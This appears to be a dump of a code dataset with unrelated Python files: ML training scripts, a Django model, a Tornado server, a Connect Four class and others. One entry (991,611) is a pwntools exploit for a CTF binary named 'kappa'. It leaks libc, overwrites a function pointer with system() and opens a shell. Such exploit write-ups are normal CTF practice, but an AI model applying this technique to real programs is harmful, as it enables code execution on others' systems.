index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
991,600 | 90b9f8b66f4db0cf33a72ef92a874263dbf744a5 | from django.db import models
from django.conf import settings
class Image(models.Model):
"""
Image model, really just a default, a more reasonable one
would create some thumbnails based on the need of the site.
"""
title = models.CharField(max_length=255, blank=True, null=True)
image = models.ImageField(upload_to="images")
description = models.TextField(blank=True, null=True)
uploaded = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
def __unicode__(self):
return '%s' % self.title
def save(self, *args, **kwargs):
if not self.title:
self.title = self.image.name
super(Image, self).save(*args, **kwargs) # Call the "real" save() method.
@property
def url(self):
return '%s%s' % (settings.MEDIA_URL, self.image)
class Meta:
verbose_name = "basic image"
verbose_name_plural = "basic images"
ordering = ['-modified',] |
991,601 | 440c1101a229df90fc661ac4e59b7018152fca52 | import tensorflow as tf
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# 加载数据,将数据拆分为:训练数据、测试数据
(train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data()
print(train_image.shape) # 打印训练数据维度
print(train_label.shape) # 打印标签的信息
print(train_image[0]) # 打印第一张图片的信息,可看到实际是一个矩阵,取值范围:0-255
plt.imshow(train_image[0]) # plt方法,打印第一张图片
plt.show()
print('打印所有标签:',train_label)
print('打印第一个标签:',train_label[0])
# 数据归一化。图片实际形式为像素矩阵,取值范围为0-255,因此需要归一化,转为0-1的矩阵
train_image = train_image / 255
test_image = test_image / 255
# 搭建模型
model = tf.keras.Sequential()
# 因为输入为2维矩阵,但网络层为1维,因此需将输入矩阵拉直,做扁平化操作
model.add(tf.keras.layers.Flatten(input_shape=(28, 28)))
model.add(tf.keras.layers.Dense(128, activation='relu'))
model.add(tf.keras.layers.Dense(10, activation='softmax'))
# 打印模型
model.summary()
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy',
metrics=['acc'])
model.fit(train_image, train_label, epochs=5)
# 测试
print('测试数据:')
model.evaluate(test_image, test_label) |
991,602 | 2e8bdf4e2468eba083a2fe8c292ae04d2d69b411 | l=[]
sonuc=["0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
a=int(input("şifre giriniz:"))
i=1
while(i==1):
kalan=(a%36)
l.append(kalan)
bolum=int(a/36)
if (bolum>=36):
i=1
a=bolum
else:
l.append(bolum)
i=0
l.reverse()
print(l)
uzunluk=len(l)
for i in range(uzunluk):
b=l[i]
print(sonuc[b],end="")
|
991,603 | a043710528a2169c7a05436639a85026e1dc99f6 | import uvicorn
if __name__ == "__main__":
uvicorn.run(
"src:app", host="0.0.0.0", port=5000, log_level="info", debug=True, reload=True
)
|
991,604 | dcd02e0862a42a3b8bd09199064c1bee80308ebd | import threading
import tornado.ioloop
import tornado.web
from tornado.httpserver import HTTPServer
import time
import logging
from handler import WsRPCHandler
from auth import authenticator
import tornado.options
from tornado.log import enable_pretty_logging
enable_pretty_logging()
logging.getLogger().setLevel(logging.INFO)
def create_app(application_settings=None):
settings = {
'authenticator' : authenticator
}
#if given for example a new auth function then override existing
if isinstance(application_settings, dict):
settings.update(application_settings)
application=tornado.web.Application([
(r'/',WsRPCHandler),
],
**settings
)
return application
def create_server(app, port=8888):
server = HTTPServer(app)
server.listen(port)
return server
def start_ioloop():
logging.info("ws_rpc ioloop started")
ioloop = tornado.ioloop.IOLoop.instance()
ioloop.start()
logging.info("ws_rpc ioloop stopped")
def stop_ioloop():
logging.info("stopping ws_rpc ioloop")
ioloop = tornado.ioloop.IOLoop.instance()
ioloop.add_callback(ioloop.stop)
def main():
tornado.options.parse_command_line()
print "ws_rpc main is running, exit with ctrl+c"
logging.info("creating application")
app = create_app()
logging.info("creating server")
server = create_server(app)
logging.info("starting ioloop thread")
thread = threading.Thread(target=start_ioloop)
thread.start()
try:
while(True):
time.sleep(1)
except KeyboardInterrupt:
server.stop()
stop_ioloop()
thread.join()
if __name__ == "__main__":
logging.info("running main")
main()
|
991,605 | f929b3059e009fd60347a8545d117f63af4b6eaa | n1,n2=map(int,input().split())
sum=0
sum=n1+n2
#print result
print(sum)
|
991,606 | 291411679f4a7f83e017945e30d70d37c9c289ec | from __future__ import print_function
import json
from os.path import isfile, join
from os import makedirs
import argparse
from node2vec import Node2Vec
import time
import shutil
class Entity2Vec(Node2Vec):
"""Generates a set of property-specific entity embeddings from a Knowledge Graph"""
def __init__(self, is_directed, preprocessing, is_weighted, p, q, walk_length, num_walks, dimensions, window_size,
workers, iterations, feedback_file):
Node2Vec.__init__(self, is_directed, preprocessing, is_weighted, p, q, walk_length, num_walks, dimensions,
window_size, workers, iterations)
self.feedback_file = feedback_file
def e2v_walks_learn(self, properties_names, dataset):
n = self.num_walks
p = int(self.p)
q = int(self.q)
l = self.walk_length
d = self.dimensions
it = self.iter
win = self.window_size
try:
makedirs('emb/%s' % dataset)
except:
pass
# copy define feedback_file, if declared
if self.feedback_file:
print('Copying feedback file %s' % self.feedback_file)
shutil.copy2(self.feedback_file, "datasets/%s/graphs/feedback.edgelist" % dataset)
# iterate through properties
for prop_name in properties_names:
# print(prop_name)
prop_short = prop_name
if '/' in prop_name:
prop_short = prop_name.split('/')[-1]
graph = "datasets/%s/graphs/%s.edgelist" % (dataset, prop_short)
try:
makedirs('emb/%s/%s' % (dataset, prop_short))
except:
pass
emb_output = "emb/%s/%s/num%d_p%d_q%d_l%d_d%d_iter%d_winsize%d.emd" % (dataset,
prop_short, n, p, q, l, d, it, win)
if not isfile(emb_output): # check if embedding file already exists
print('running with', graph)
super(Entity2Vec, self).run(graph, emb_output) # call the run function defined in parent class node2vec
else:
print('Embedding file already exist, going to next property...')
continue
@staticmethod
def parse_args():
"""
Parses the entity2vec arguments.
"""
parser = argparse.ArgumentParser(description="Run entity2vec.")
parser.add_argument('--walk_length', type=int, default=10,
help='Length of walk per source. Default is 10.')
parser.add_argument('--num_walks', type=int, default=500,
help='Number of walks per source. Default is 40.')
parser.add_argument('--p', type=float, default=1,
help='Return hyperparameter. Default is 1.')
parser.add_argument('--q', type=float, default=1,
help='Inout hyperparameter. Default is 1.')
parser.add_argument('--weighted', dest='weighted', action='store_true',
help='Boolean specifying (un)weighted. Default is unweighted.')
parser.add_argument('--unweighted', dest='unweighted', action='store_false')
parser.set_defaults(weighted=False)
parser.add_argument('--directed', dest='directed', action='store_true',
help='Graph is (un)directed. Default is directed.')
parser.set_defaults(directed=False)
parser.add_argument('--no_preprocessing', dest='preprocessing', action='store_false',
help='Whether preprocess all transition probabilities or compute on the fly')
parser.set_defaults(preprocessing=True)
parser.add_argument('--dimensions', type=int, default=500,
help='Number of dimensions. Default is 128.')
parser.add_argument('--window-size', type=int, default=10,
help='Context size for optimization. Default is 10.')
parser.add_argument('--iter', default=5, type=int,
help='Number of epochs in SGD')
parser.add_argument('--workers', type=int, default=8,
help='Number of parallel workers. Default is 8.')
parser.add_argument('--config_file', nargs='?', default='config/properties.json',
help='Path to configuration file')
parser.add_argument('--dataset', nargs='?', default='movielens_1m',
help='Dataset')
parser.add_argument('--feedback_file', dest='feedback_file', default=False,
help='Path to a DAT file that contains all the couples user-item')
return parser.parse_args()
if __name__ == '__main__':
start_time = time.time()
args = Entity2Vec.parse_args()
print('Parameters:\n')
print('walk length = %d\n' % args.walk_length)
print('number of walks per entity = %d\n' % args.num_walks)
print('p = %s\n' % args.p)
print('q = %s\n' % args.q)
print('weighted = %s\n' % args.weighted)
print('directed = %s\n' % args.directed)
print('no_preprocessing = %s\n' % args.preprocessing)
print('dimensions = %s\n' % args.dimensions)
print('iterations = %s\n' % args.iter)
print('window size = %s\n' % args.window_size)
print('workers = %s\n' % args.workers)
print('config_file = %s\n' % args.config_file)
print('dataset = %s\n' % args.dataset)
print('feedback file = %s\n' % args.feedback_file)
e2v = Entity2Vec(args.directed, args.preprocessing, args.weighted, args.p, args.q, args.walk_length, args.num_walks,
args.dimensions, args.window_size, args.workers, args.iter, args.config_file,
args.dataset, args.feedback_file)
e2v.e2v_walks_learn()
print("--- %s seconds ---" % (time.time() - start_time))
|
991,607 | 81f897ea2a38caa81d178d43a1795dca7d495b96 | # Generated by Django 3.2 on 2021-07-30 03:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('menteerequest', '0013_mentee_request_finish_check'),
]
operations = [
migrations.AddField(
model_name='mname',
name='post_id',
field=models.CharField(blank=True, max_length=20),
),
]
|
991,608 | a45a0f276014a24e5374c2a233395bb12edf08dd | import cv2
# Remember to rotate your camera
cap = cv2.VideoCapture(0)
while cap.isOpened():
isSuccess, frame = cap.read()
rotated = cv2.rotate(frame, cv2.ROTATE_90_COUNTERCLOCKWISE)
cv2.imshow('My webcam stream', rotated)
# Press 'Esc' to quit
if cv2.waitKey(1) == 27:
break
cap.release()
cv2.destroyAllWindows()
|
991,609 | 2c41c2e4e8fc3c0ab42341ec89d52f94d1793976 | import io
num_tests = 0
failed_tests = 0
def equal(expr, expected):
global num_tests
global failed_tests
num_tests += 1
if(expr == expected):
print("Test Passed with result: '", expr, "'", sep = '')
else:
failed_tests += 1
print("Failed!\n expected: '", expected, "'\n but got : '", expr, "'", sep = '')
return
def str_print(*objects):
out = io.StringIO()
print(*objects, file=out, end="")
res = out.getvalue()
return res
def output(*objects, expected=""):
out = str_print(*objects)
equal(out, expected)
return
def summary():
print("-------------------------------------------")
if failed_tests == 0:
print("All", num_tests, "passed!")
else:
print("{} out of {} tests failed!".format(failed_tests, num_tests))
|
991,610 | 9c8dd33cd8b40af67e19b3233d0af30cb2042f2a | # -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import sklearn.preprocessing as skp
import sklearn.feature_extraction as skf
import scipy.sparse as ss
import sklearn.model_selection as sms
import sklearn.linear_model as slm
import tqdm
import sklearn.neighbors as skn
import sklearn.ensemble as se
import seaborn as sns
renesans=pd.read_csv("/Users/sveta/Downloads/Задача 1/Book1.csv",sep=",",header=0)
renesans=pd.DataFrame(renesans)
# lets have a look into our data
renesans["POLICY_ID"].unique()
renesans["POLICY_BEGIN_MONTH"].unique()
renesans["POLICY_END_MONTH"].unique()
renesans["POLICY_SALES_CHANNEL"].unique() #много каналов
renesans["POLICY_SALES_CHANNEL_GROUP"].unique() #less chanels, probably will use it
renesans["POLICY_BRANCH"].unique() # Moscow and St-Peter
renesans["POLICY_MIN_DRIVING_EXPERIENCE"].unique() #needs to be cleaned. update: done
renesans["POLICY_MIN_AGE"].unique()
renesans["VEHICLE_MAKE"].unique() #car brands
renesans["VEHICLE_MODEL"].unique() #car model
renesans["VEHICLE_ENGINE_POWER"].unique()
renesans["VEHICLE_IN_CREDIT"].unique()
renesans["VEHICLE_SUM_INSURED"].unique()
renesans["POLICY_INTERMEDIARY"].unique()
renesans["INSURER_GENDER"].unique()
renesans["POLICY_CLM_N"].unique() #количество убытков по полису
renesans["POLICY_CLM_GLT_N"].unique() #hell knows
renesans["POLICY_COURT_SIGN"].unique() #hell knows
renesans["POLICY_PRV_CLM_N"].unique() # hell knows 0/1
renesans["POLICY_PRV_CLM_GLT_N"].unique()
renesans["CLAIM_AVG_ACC_ST_PRD"].unique() # avg claim idk
renesans["POLICY_HAS_COMPLAINTS"].unique() #bi var
renesans["POLICY_YEARS_RENEWED_N"].unique() #what is N???
renesans["POLICY_DEDUCT_VALUE"].unique() #smth numerical
renesans["CLIENT_REGISTRATION_REGION"].unique() #regions
renesans["POLICY_PRICE_CHANGE"].unique() #price change num
#так как данные грязные и у нас год начала стажа и количество лет стажа в одной колонке, мы фильтруем
# годы и вычитаем из из 2018, чтобы получить количество лет стажа
renesans.loc[renesans["POLICY_MIN_DRIVING_EXPERIENCE"]>100,"POLICY_MIN_DRIVING_EXPERIENCE"]=2018-renesans.loc[renesans["POLICY_MIN_DRIVING_EXPERIENCE"]>100,"POLICY_MIN_DRIVING_EXPERIENCE"]
# делаем длительность
renesans["POLICY_END_MONTH"]='2019'+'-'+renesans["POLICY_END_MONTH"].map(str)+'-'+'01'
renesans["POLICY_END_MONTH"]=pd.to_datetime(renesans["POLICY_END_MONTH"])
renesans["POLICY_BEGIN_MONTH"]='2018'+'-'+renesans["POLICY_BEGIN_MONTH"].map(str)+'-'+'01'
renesans["POLICY_BEGIN_MONTH"]=pd.to_datetime(renesans["POLICY_BEGIN_MONTH"])
renesans["POLICY_LEN"]=renesans["POLICY_END_MONTH"]-renesans["POLICY_BEGIN_MONTH"]
renesans["POLICY_LEN"]=renesans["POLICY_LEN"].dt.days/30
renesans["POLICY_LEN"]=renesans["POLICY_LEN"].round(0)
renesans["POLICY_LEN"]=[1 if (x==12) else 0 for x in renesans["POLICY_LEN"].values]
renesans["POLICY_LEN"].unique()
### продолжим готовить данные
renesans["POLICY_BRANCH"]=[1 if (x=='Москва') else 0 for x in renesans["POLICY_BRANCH"].values]
renesans["INSURER_GENDER"]=[1 if (x=='F') else 0 for x in renesans["INSURER_GENDER"].values]
#избавимся от Na
renesans.drop(renesans.loc[renesans['POLICY_YEARS_RENEWED_N']=='N'].index, inplace=True)
#что войдёт в анализ
policyidtest=renesans.loc[renesans['DATA_TYPE']=='TEST ','POLICY_ID']
renesans=renesans.drop(['POLICY_ID','POLICY_BEGIN_MONTH', 'POLICY_END_MONTH','POLICY_SALES_CHANNEL','POLICY_INTERMEDIARY'],axis=1)
### и готовимся к перекодировке
standard = skp.StandardScaler()
maxabs = skp.MaxAbsScaler()
label = skp.LabelEncoder()
onehot = skp.OneHotEncoder()
season = skp.LabelBinarizer()
labelbin = skp.LabelBinarizer()
absvar = ['VEHICLE_ENGINE_POWER', 'VEHICLE_SUM_INSURED']
scalevar = ['POLICY_MIN_AGE', 'POLICY_MIN_DRIVING_EXPERIENCE', 'CLAIM_AVG_ACC_ST_PRD',
'POLICY_YEARS_RENEWED_N', 'POLICY_DEDUCT_VALUE', 'POLICY_PRICE_CHANGE']
bivar = ['POLICY_BRANCH', 'VEHICLE_IN_CREDIT', 'CLIENT_HAS_DAGO', 'CLIENT_HAS_OSAGO',
'POLICY_COURT_SIGN', 'POLICY_HAS_COMPLAINTS', 'INSURER_GENDER','POLICY_LEN']
onehotvar = ['POLICY_SALES_CHANNEL_GROUP']
# 'POLICY_CLM_N', 'POLICY_CLM_GLT_N', 'POLICY_PRV_CLM_N','POLICY_PRV_CLM_GLT_N' идут по отдельности
### нормализуем
renesans_abs=maxabs.fit_transform(renesans[absvar])
renesans_scale = standard.fit_transform(renesans[scalevar])
renesans_bi = renesans[bivar]
renesans_onehot = onehot.fit_transform(renesans[onehotvar])
renesans_N = labelbin.fit_transform(renesans['POLICY_CLM_N'])
renesans_GLT_N = labelbin.transform(renesans['POLICY_CLM_GLT_N'])
renesans_PRV_N = labelbin.transform(renesans['POLICY_PRV_CLM_N'])
renesans_PRV_GLT_N = labelbin.transform(renesans['POLICY_PRV_CLM_GLT_N'])
reg=['CLIENT_REGISTRATION_REGION']
Vreg = skf.DictVectorizer()
renesans_reg = Vreg.fit_transform(renesans[reg].fillna('-').T.to_dict().values())
cars = ['VEHICLE_MAKE', 'VEHICLE_MODEL']
Vcars = skf.DictVectorizer()
renesans_cars = Vcars.fit_transform(renesans[cars].fillna('-').T.to_dict().values())
####
R_train_ = ss.hstack([renesans_abs, renesans_scale, renesans_bi, renesans_onehot, renesans_N,
renesans_GLT_N, renesans_PRV_N, renesans_PRV_GLT_N, renesans_reg, renesans_cars])
## в предыдущем варианте кода под самый конец вылезла ошибка - валидационная выборка была меньше, чем тестова,
# потому что туда не вошли некоторые значения переменных, как следствие, недосоздались столбцы.
# Пришлось извращаться - тк у нас не было сортировок, то порядок всюду сохраняется.
# Поэтому я вытащу номера строк тренировочной выборки, а потом тестовой.
# Почле чего отфильтрую нужные строки по выборкам
renesans_DT=np.array([1 if (x=='TRAIN') else 0 for x in renesans["DATA_TYPE"].values])
Train_rows=(renesans_DT==1).nonzero()[0]
Test_rows=(renesans_DT==0).nonzero()[0]
# делим выборки
R_train_all=R_train_.tocsc()[Train_rows]
R_test_all=R_train_.tocsc()[Test_rows]
y_train = renesans.loc[renesans['DATA_TYPE']=='TRAIN','POLICY_IS_RENEWED']
R_train_2, R_valid, y_train_2, y_valid = sms.train_test_split(R_train_all, y_train, test_size = 0.2,
random_state = 1)
# мера качества моделей - сумма true positive и true negative
# больше можно посмотреть тут https://towardsdatascience.com/metrics-to-evaluate-your-machine-learning-algorithm-f10ba6e38234
### Начнём с классики. logit классификатор.
stkf = sms.StratifiedKFold(n_splits = 5, random_state = 1, shuffle = True)
C_space = np.logspace(-3, 2, 6)
for c in tqdm.tqdm(C_space):lr = slm.LogisticRegression(C = c, random_state = 1)
print(c, sms.cross_val_score(lr, R_train_2, y_train_2, scoring='accuracy', cv=stkf).mean())
# я не возлагаю много надежд на логит, поэтому сразу подтюним его
### ЛР
lr = slm.LogisticRegression(C = 0.1, random_state = 1)
bg_lr = se.BaggingClassifier(base_estimator = lr, n_estimators = 100, random_state = 1, n_jobs=1)
params = {'max_features': [3,6,12,24,48,96,192,384],
'max_samples': [0.5, 0.75, 0.9]}
rs_lr = sms.RandomizedSearchCV(estimator = bg_lr, n_jobs = 2, cv = stkf, verbose = 2,
param_distributions = params, scoring = 'accuracy', n_iter = 20, random_state=1)
rs_lr.fit(R_train_2, y_train_2)
print(rs_lr.best_score_, rs_lr.best_params_) #0.6651854963805585 {'max_samples': 0.9, 'max_features': 384}
lr = slm.LogisticRegression(C = 0.1, random_state = 1)
bg_lr = se.BaggingClassifier(base_estimator = lr, n_estimators = 10, random_state = 1, n_jobs=2, max_features=0.7)
print(sms.cross_val_score(bg_lr, R_train_2, y_train_2, scoring='accuracy', cv=stkf).mean()) #0.6688857348064529
###далее попробуем KNN, однако уберем все категореальные признаки, чтобы найти нужный размер выборки и гиперпараметры для уменьшения времени, а потом багганём
#(зачем это надо см https://www.quora.com/What-is-bagging-in-machine-learning)
R_train_knn = ss.hstack([renesans_abs, renesans_scale, renesans_bi])
R_train_knn=R_train_knn.tocsc()[Train_rows]
R_train_2, R_valid, y_train_2, y_valid = sms.train_test_split(R_train_knn, y_train, test_size = 0.2, random_state = 1)
R_train_2_short = R_train_2[:10000,:]
y_train_2_short = y_train_2[:10000]
knn = skn.KNeighborsClassifier()
clf = sms.GridSearchCV(estimator = knn, n_jobs = 1, cv = stkf, return_train_score = True, verbose = 1,
param_grid = {"n_neighbors": [1,3,5,10,20,50], "weights": ["uniform", "distance"]})
clf.fit(R_train_2_short, y_train_2_short)
clf.cv_results_['mean_test_score'].mean()#0.61
clf.best_params_#n_neighbors': 50, 'weights': 'uniform'
#
clf = sms.GridSearchCV(estimator = knn, n_jobs = 1, cv = stkf, return_train_score = True, verbose = 0,
param_grid = {"n_neighbors":[30,70,100,150], "weights": ['uniform', 'distance']})
clf.fit(R_train_2_short, y_train_2_short)
clf.best_score_ #best score
clf.best_params_ # best parametrs
#
knn = skn.KNeighborsClassifier(n_neighbors = 100, weights = 'distance')
R_train_all = ss.hstack([renesans_abs, renesans_scale, renesans_bi, renesans_N,renesans_onehot,
renesans_GLT_N, renesans_PRV_N, renesans_PRV_GLT_N])
R_train_knn=R_train_.tocsc()[Train_rows]
R_train_2, R_valid, y_train_2, y_valid = sms.train_test_split(R_train_knn, y_train, test_size = 0.2, random_state = 1)
R_train_2_short = R_train_2[:10000,:]
y_train_2_short = y_train_2[:10000]
print(sms.cross_val_score(knn, R_train_2_short, y_train_2_short, scoring='accuracy', cv=stkf).mean()) #0.65 растём-с
###
R_train_all = ss.hstack([renesans_abs, renesans_scale, renesans_bi, renesans_onehot, renesans_N,
renesans_GLT_N, renesans_PRV_N, renesans_PRV_GLT_N, renesans_reg, renesans_cars])
R_train_all=R_train_all.tocsc()[Train_rows]
R_train_2, R_valid, y_train_2, y_valid = sms.train_test_split(R_train_all, y_train, test_size = 0.2, random_state = 1)
R_train_2_short = R_train_2[:10000,:]
y_train_2_short = y_train_2[:10000]
print(sms.cross_val_score(knn, R_train_2_short, y_train_2_short, scoring='accuracy', cv=stkf).mean())
bg = se.BaggingClassifier(base_estimator = knn, max_samples = 10000, random_state = 1, verbose = 1)
print(sms.cross_val_score(bg, R_train_2, y_train_2, scoring='accuracy', cv=stkf).mean())# 0.658
### делаем RF, гиперпараметр - ДЖини, см https://www.quora.com/Machine-Learning/Are-gini-index-entropy-or-classification-error-measures-causing-any-difference-on-Decision-Tree-classification\
rf = se.RandomForestClassifier(random_state = 1, n_estimators=100, max_depth=1000, oob_score=True, class_weight='balanced')
print(sms.cross_val_score(rf, R_train_2, y_train_2, scoring='accuracy', cv=stkf).mean()) #0.697 лучшее, что пока есть
## Улучшаем RF
params = {"max_depth": [50, 150, 550, 800, 1500],
"min_samples_leaf": [1, 3, 5, 8],
"max_features": [2, 5, 15, 40, 100]}
rs = sms.RandomizedSearchCV(estimator = rf, n_jobs = 2, cv = stkf, verbose = 2, param_distributions = params,
scoring = 'accuracy', n_iter = 20)
rs.fit(R_train_2, y_train_2)
print(rs.best_score_, rs.best_params_) #0.7083117890382626 {'min_samples_leaf': 1, 'max_features': 100, 'max_depth': 300}
### Градиентный бустинг
# проверь параметры!!!!!!!!!
params = {'n_estimators': [100, 400, 700, 1000],
'max_depth': [2, 4, 6, 8, 10],
'min_samples_leaf': [1, 2, 3, 5],
'max_features': [2, 4, 8, 16, 32, 64, 128]}
gb = se.GradientBoostingClassifier(random_state = 1)
rs_gb = sms.RandomizedSearchCV(estimator = gb, n_jobs = 2, cv = stkf, verbose = 2, param_distributions = params,
scoring = 'accuracy', n_iter = 50, random_state=1)
rs_gb.fit(R_train_2, y_train_2)
print(rs_gb.best_score_, rs_gb.best_params_)#0.7157607290589452 {'n_estimators': 700, 'min_samples_leaf': 2, 'max_features': 128, 'max_depth': 4}
#У нас есть 4 модели, обучим их на тренировочной выборке: проверим accuracy, получим предсказания на валидационной выборке и построим модель 2-ого уровня
###ПРОВЕРЬ ПАРАМЕТРЫ!!!!!!
rf = se.RandomForestClassifier(random_state = 1, n_estimators=100, max_depth=300, oob_score=True,
class_weight='balanced', max_features = 100)
gb = se.GradientBoostingClassifier(random_state = 1, n_estimators = 700, min_samples_leaf = 2, max_depth = 4,
max_features = 128)
lr.fit(R_train_2, y_train_2)
print("lr:", lr.score(R_valid, y_valid)) #0.6700058165837265
bg.fit(R_train_2, y_train_2)
print("bg:", bg.score(R_valid, y_valid))#0.6592128223356815
rf.fit(R_train_2, y_train_2)
print("rf:", rf.score(R_valid, y_valid))#0.7093000710915789
gb.fit(R_train_2, y_train_2)
print("gb:", gb.score(R_valid, y_valid))#0.718606605053965
#больших отличий от кросс-валидации нет, переобучения или недообучения тоже вроде нет,
# так как скоринг не зашкаливает, но и не критично низкий
# Далее, надо получить вероятности классов
pred_lr = lr.predict_proba(R_valid)[:,1]
pred_bg = bg.predict_proba(R_valid)[:,1]
pred_rf = rf.predict_proba(R_valid)[:,1]
pred_gb = gb.predict_proba(R_valid)[:,1]
# "усредним" все результаты с помощью логистической регресс (используем мета-алгоритм)
meta_features = [pred_lr, pred_bg, pred_rf, pred_gb]
meta_X_valid = pd.DataFrame(meta_features).T
meta_X_valid.columns = ['lr', 'bg', 'rf', 'gb']
meta_X_valid.head()
meta_lr = slm.LogisticRegression(random_state = 1)
print(sms.cross_val_score(lr, meta_X_valid, y_valid, scoring='accuracy', cv=stkf).mean())
meta_lr.fit(meta_X_valid, y_valid)
##
pred_lr = lr.predict_proba(R_test_all)[:,1]
pred_bg = bg.predict_proba(R_test_all)[:,1]
pred_rf = rf.predict_proba(R_test_all)[:,1]
pred_gb = gb.predict_proba(R_test_all)[:,1]
meta_features = [pred_lr, pred_bg, pred_rf, pred_gb]
meta_X_test = pd.DataFrame(meta_features).T
meta_X_test.columns = ['lr', 'bg', 'rf', 'gb']
prediction = meta_lr.predict(meta_X_test)
prediction=pd.DataFrame(prediction)
prediction.columns=['prediction']
outfile=pd.DataFrame(prediction,policyidtest)
# Выгружаем
outfile.to_csv('/Users/sveta/Downloads/Задача 1/prediction.csv')
### картинка
sns.set(style="darkgrid")
ax = sns.countplot(x=outfile['prediction'], data=outfile)
ax.figure.savefig('/Users/sveta/Downloads/Задача 1/output.png')
# Добби свободен |
991,611 | 2fdaca50777f273534a00375b9f4a5c92c353c27 | #!/usr/bin/env python2
from pwn import *
'''
bugs:
if you have a charizard, you can set the charizards artwork so that bird_attack_name points to a mem location and it will leak that memlocation by switching to the charizard in a fight
when catching a pokemon when you are full, it does not set the poke_type correctly. so if you replace a kakuna with the charizard, the function pointer will point to inside the artwork (so we can set that to system())
also: choose_pokemon can return -1. I don't think this is useful for exploitation.
exploit strat:
catch 4 kakunas
catch the charizard, replace on of the kakunas with it. Name the charizard /bin/sh Change artwork, set charizard->bird_attack_name to a pointer to stdin@data, set charizard->bird_health to a high value. Then go into battle, switch to charizard, attack something to leak libc address. Then change artwork of charizard again, set charizard->kakuna_proc to system@libc.
then inspect ur pokes to get shell!
offsets:
artwork offset: 0x0F
kakuna_proc: 0x210
bird_health: 0x5ec
bird_attack_name: 0x5f4
'''
#context.log_level = 'DEBUG'
context.terminal = ['gnome-terminal', '-e']
elf = ELF("./kappa")
libc = ELF("/lib/i386-linux-gnu/i686/cmov/libc-2.19.so")
r = process("./kappa_nosleep")
#r = gdb.debug("./kappa_nosleep")
grass_ctr = 0
num_caught = 0
def catch_poke(name="poop", run=False):
global grass_ctr, num_caught
grass_ctr += 1
r.recvuntil("work\n\n")
r.sendline("1")
r.recvuntil(".\n.\n.\n")
l = r.recvline()
if l.startswith("You"):
# no pokemon
return
if run and num_caught >= 4:
r.sendline("3")
return
if grass_ctr % 13 != 0:
# kakuna
r.sendline('2')
r.recvuntil("?\n")
r.sendline(name)
num_caught += 1
return
# charizard
# attack 4 times
for _ in range(0, 4):
r.recvuntil("Run\n")
r.sendline("1")
r.recvuntil("Run\n")
r.sendline("2")
r.recvuntil("?\n")
r.sendline(name)
# catch the kakunas, keep 4 and see 13
for _ in range(12):
catch_poke("poop", True)
# now catch the charizard
catch_poke("/bin/sh")
# replace pokemon 2
r.sendline("2")
r.recvuntil("work\n\n")
# now set artwork: leak _IO_stdin (offset: 0x001a9c20)
# address is something in main that points to stdin
artwork = fit({0x5f4-0xf:p32(0x80492b3), 0x5ec-0xf:p32(1000)}, length=2128)
r.sendline("5")
r.sendline("2")
r.send(artwork)
r.recvuntil("friends!\n")
# now fight a poke, leak libc
r.recvuntil("work\n\n")
r.sendline("1")
r.recvuntil("Run\n")
r.sendline("4")
r.sendline("2")
r.recvuntil("Run\n")
r.sendline("1")
r.recvuntil("used ")
stdin_addr = u32(r.recvn(4))
libc_base = stdin_addr - 0x001a9c20
log.info("Leaked libc base: " + hex(libc_base))
# now set the kakuna proc to system in the artwork
artwork = fit({0x210-0xf:p32(libc_base + libc.symbols["system"])}, length=2127)
r.recvuntil("work\n\n")
r.sendline("5")
r.sendline("2")
r.send(artwork)
r.recvuntil("work\n\n")
# now inspect to run system
r.sendline("3")
r.interactive()
|
991,612 | 0d5a045ce2a48b6600496115ae582318c6986de2 | a=int(input("enter the number"))
temp=a
a1=str(a)
b=len(a1)
print(b)
sum=0
while temp!=0:
digit = temp % 10
q=temp//10
temp=q
sum += digit ** b
if a == sum:
print(a,"is an Armstrong number")
else:
print(a,"is not an Armstrong number")
|
991,613 | 45a40fc7bc07506365ba475d797c78585484306f | class Solution:
def rob(self, nums: List[int]) -> int:
if len(nums) == 0: return 0
memo = [0 for x in range(len(nums))]
memo[0] = nums[0]
for i in range(1, len(nums)):
memo[i] = max(memo[i-1], memo[i-2] + nums[i])
return memo[-1] |
991,614 | 7e6bde91bcddf98329ea24906f5cad1eba53a973 | from random import randint
class Board:
""" a datatype representing a C4 board
with an arbitrary number of rows and cols
"""
def __init__( self, width, height ):
""" the constructor for objects of type Board """
self.width = width
self.height = height
W = self.width
H = self.height
self.data = [ [' ']*W for row in range(H) ]
# we do not need to return inside a constructor!
def __repr__(self):
""" this method returns a string representation
for an object of type Board
"""
W = self.width
H = self.height
s = '' # the string to return
for row in range(0, H):
s += '|'
for col in range(0, W):
s += self.data[row][col] + '|'
s += '\n'
s += (2 * W + 1) * '-' # bottom of the board
s += '\n'
x = -1
for i in range(W):
if x == 9:
x = 0
s += " " + str(x)
else:
x += 1
s += " " + str(x)
return s # the board is complete, return it
def setBoard(self, moveString):
""" takes in a string of columns and places
alternating checkers in those columns,
starting with 'X'
For example, call b.setBoard('012345')
to see 'X's and 'O's alternate on the
bottom row, or b.setBoard('000000') to
see them alternate in the left column.
moveString must be a string of integers
"""
nextCh = 'X' # start by playing 'X'
for colString in moveString:
col = int(colString)
if 0 <= col <= self.width:
self.addMove(col, nextCh)
if nextCh == 'X':
nextCh = 'O'
else:
nextCh = 'X'
def addMove(self,col,ox):
for i in range(self.height-1,-1,-1):
if self.data[i][col]==' ':
self.data[i][col]=ox;break;
def allowsMove(self,col):
if 0<col<self.width:
if self.data[0][col] == ' ':
return True
return False
def isFull(self):
for i in (0,self.width):
if self.allowsMove(i):
return False;
return True
def delMove(self,col):
for i in range(0,self.height,1):
if self.data[i][col]!= ' ':
self.data[i][col] = ' ';break;
def winsFor(self,ox):
H = self.height
W = self.width
D = self.data
# check for horizontal wins
for row in range(0, H):
for col in range(0, W - 3):
if D[row][col] == ox and \
D[row][col + 1] == ox and \
D[row][col + 2] == ox and \
D[row][col + 3] == ox:
return True
for row in range (0,H-3):
for col in range(0, W):
if D[row][col] == ox and \
D[row+1][col] == ox and \
D[row+2][col] == ox and \
D[row+3][col] == ox:
return True
for i in range (0,H-3):
for j in range(0,W-3):
if D[i][j] == ox and \
D[i + 1][j+1] == ox and \
